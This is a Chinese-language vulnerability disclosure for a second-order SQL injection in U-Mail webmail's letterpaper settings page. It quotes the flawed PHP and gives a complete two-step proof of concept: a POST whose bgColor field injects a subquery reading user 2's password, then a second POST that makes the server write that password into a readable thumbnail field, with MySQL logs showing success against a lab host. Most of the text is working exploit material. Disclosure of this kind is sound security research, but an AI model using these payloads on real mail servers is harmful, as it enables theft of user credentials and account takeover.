win2003 默认安装 最新版 漏洞文件:/client/option/module/o_letterpaper.php
if ( ACTION == "letterpaper-set" ) { $url = make_link( "option", "view", "letterpaper" ); $lp_id = intval( gss( $_POST['id'] ) ); ..... if ( gss( $_POST['padding'] ) ) { $style .= "padding:".gss( $_POST['padding'] ).";"; } else { $style .= "padding:20px 30px;"; } if ( $lp_id ) { $where = "id='".$lp_id."'"; $lp_info = $Widget->getone_letterpaper( $where, "*", 0 ); if ( gss( $_POST['bgImgPath'] ) ) { $suffix = fileext( $_POST['bgImgPath'] ); check_upload_suffix( $suffix ); $bgimg = WEBMAIL_URL."resource/images/letterpaper/".$lp_id.".".$suffix; $thumb = WEBMAIL_URL."resource/images/letterpaper/thumbnail/".$lp_id.".".$suffix; $style .= "background-image:url(".$bgimg.");"; } else if ( !gss( $_POST['bgImgUrl'] ) ) //第一次从这里进入插入注入代码 { $thumb = gss( $_POST['bgColor'] ) ? "background-color:".gss( $_POST['bgColor'] ) : "background-color:#fff"; } else { $thumb = $lp_info['thumbnail']; // 第二次进入这里 从上面查询出来的赋予$thumb $style .= "background-image:".gss( $_POST['bgImgUrl'] ).";"; } $letterpaper_new = str_replace( "%s", $style, $letterpaper ); $data = array( "letterpaper" => $letterpaper_new, "thumbnail" => $thumb ); $where = "id='".$lp_id."'"; $res = $Widget->update_letterpaper( $data, $where, 0 );//进入更新
第一次更新 我们用于二次注入的代码 xx',`thumbnail`=(SELECT password from userlist where userid=2)# 第二次让它把之前更新的代码重新查询出来 赋予给$thumb 再次进入更新
漏洞证明: 需要个umail账号 第一步: 访问http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set post:id=1&bgColor=xx',`thumbnail`=(SELECT password from userlist where userid=2)#
操作日志:
150305 15:45:38 195 Connect umail@localhost on 195 Query SET NAMES 'UTF8' 195 Init DB umail 195 Query SELECT * FROM letterpaper WHERE id='1' LIMIT 1 195 Query UPDATE letterpaper SET `letterpaper`='<div id="lp_wrap" style="background-color:xx\',`thumbnail`=(SELECT password from userlist where userid=2)#;padding:20px 30px;"><div id="lp_wrap_content"></div></div>',`thumbnail`='background-color:xx\',`thumbnail`=(SELECT password from userlist where userid=2)#' WHERE id='1' 195 Quit
第二步: 访问http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set post:id=1&bgImgUrl=xx
操作日志:
150305 15:47:41 196 Connect umail@localhost on 196 Query SET NAMES 'UTF8' 196 Init DB umail 196 Query SELECT * FROM letterpaper WHERE id='1' LIMIT 1 196 Query UPDATE letterpaper SET `letterpaper`='<div id="lp_wrap" style="padding:20px 30px;background-image:xx;"><div id="lp_wrap_content"></div></div>',`thumbnail`='background-color:xx',`thumbnail`=(SELECT password from userlist where userid=2)#' WHERE id='1' 196 Quit
成功update 最后直接访问http://192.168.106.137/webmail/client/option/index.php?module=operate&action=letterpaper-set 查看源文件